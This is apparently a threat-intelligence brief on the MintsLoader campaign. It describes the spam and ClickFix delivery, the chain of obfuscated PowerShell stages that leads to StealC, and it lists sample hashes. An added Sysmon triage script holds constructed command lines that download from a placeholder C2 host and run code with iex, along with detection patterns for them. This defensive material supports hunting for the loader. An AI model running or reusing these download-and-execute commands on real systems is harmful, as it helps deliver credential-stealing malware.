Verticals Targeted: Oil & Gas, Energy, Legal Services
Executive Summary
MintsLoader, a PowerShell-based loader, was recently observed delivering StealC and BOINC.
Key Takeaways
- MintsLoader, a PowerShell-based loader, was recently observed delivering StealC and BOINC.
- In this ongoing campaign, MintsLoader is being delivered via spam emails that link to a Kongtuke/ClickFix page or a JScript file.
- MintsLoader uses a domain generation algorithm (DGA) as well as anti-VM measures in an effort to evade detection and analysis.
What is MintsLoader?
MintsLoader, a PowerShell-based loader, was recently observed delivering StealC and BOINC. The campaign has targeted entities in the energy, oil & gas (ONG), and legal services verticals. Targets have been located in the US and Europe. eSentire reported on this activity.
In early January 2025, eSentire researchers observed a campaign leveraging MintsLoader to deliver StealC and the Berkeley Open Infrastructure for Network Computing (BOINC) client. In this ongoing campaign, the PowerShell-based MintsLoader is being delivered via spam emails that link to a Kongtuke/ClickFix page or a JScript file.
The infection chain begins when a user clicks the link in the spam email, which downloads a JScript file. Following a 13-second sleep, a WScript.Shell object is instantiated. Next, the Run method is called to execute the loader’s first command in PowerShell. The command uses curl to retrieve MintsLoader’s first stage. The script deletes itself on exit in an effort to hinder analysis.
The MintsLoader C2 responds with another obfuscated PowerShell script, which uses iex to execute the next stage, itself also obfuscated. Once deobfuscated, the script checks for the presence of a virtual machine. MintsLoader uses a domain generation algorithm (DGA) as well as anti-VM measures in an effort to evade detection and analysis. The final PowerShell stage of the sample from eSentire’s analysis results in the delivery of the stealer malware StealC, although some samples also reportedly delivered BOINC.
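The process chain described above (a Windows script host spawning PowerShell that fetches with curl, hides its window, and later runs text with iex) is something a defender can hunt for in endpoint telemetry. The following triage script is an added example, not code from the report or from PolySwarm; the Sysmon-style events and the c2-placeholder.invalid hostname are constructed, and the field names assume Sysmon Event ID 1 naming.

```python
import re

# Constructed Sysmon-style process-creation events; none is real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden -c "curl http://c2-placeholder.invalid/s1 -o $env:TEMP\s1.ps1"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\scripts\nightly-backup.ps1"},
    {"ParentImage": r"C:\Windows\System32\cscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -nop -c "iex (Get-Content $env:TEMP\s2.txt -Raw)"'},
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
# Indicators taken from the chain the report describes: a script host spawning
# PowerShell that downloads with curl, executes text with iex, or hides its window.
CMD_PATTERNS = {
    "curl download": re.compile(r"\bcurl(\.exe)?\b", re.I),
    "iex execution": re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
    "hidden window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
}

def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def triage_event(event):
    """Return the indicators matched by one event; an empty list means not flagged."""
    if basename(event["Image"]) != "powershell.exe":
        return []
    if basename(event["ParentImage"]) not in SCRIPT_HOSTS:
        return []
    cmd = event["CommandLine"]
    return [name for name, pat in CMD_PATTERNS.items() if pat.search(cmd)]

def triage(events):
    """Map the index of each flagged event to the indicators it matched."""
    flagged = {}
    for i, event in enumerate(events):
        hits = triage_event(event)
        if hits:
            flagged[i] = hits
    return flagged

if __name__ == "__main__":
    for i, hits in triage(SAMPLE_EVENTS).items():
        print(f"event {i}: script host -> PowerShell with {', '.join(hits)}")
```

The parent-process condition is what keeps a plain `powershell -File` launched from Explorer out of the results; loosen it only if your environment has few legitimate wscript/cscript-to-PowerShell chains.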
What is StealC?
StealC is an information stealer malware written in C that surfaced in 2023, drawing inspiration from other notable stealers like Raccoon and Redline. It is designed to harvest sensitive data, such as credentials and cryptocurrency wallets, from infected machines.
What is BOINC?
Berkeley Open Infrastructure for Network Computing (BOINC) is not malicious in and of itself. It is typically used for volunteer computing projects. It has been observed in this campaign as an unusual secondary payload, suggesting the threat actors behind this campaign may exploit its resource-intensive functionality for unauthorized purposes.
IOCs
PolySwarm has multiple samples associated with this campaign.
b8804a7ef09a9c1e8ede3a86a087b754b42f5b37c6de1e82c86f38d01c297ee2 (MintsLoader)
138d2a62b73e89fc4d09416bcefed27e139ae90016ba4493efc5fbf43b66acfa (StealC)
91e405e8a527023fb8696624e70498ae83660fe6757cef4871ce9bcc659264d3 (BOINC)
You can use the following CLI command to search for all samples of a particular malware family in our portal:
$ polyswarm link list -f MalwareFamily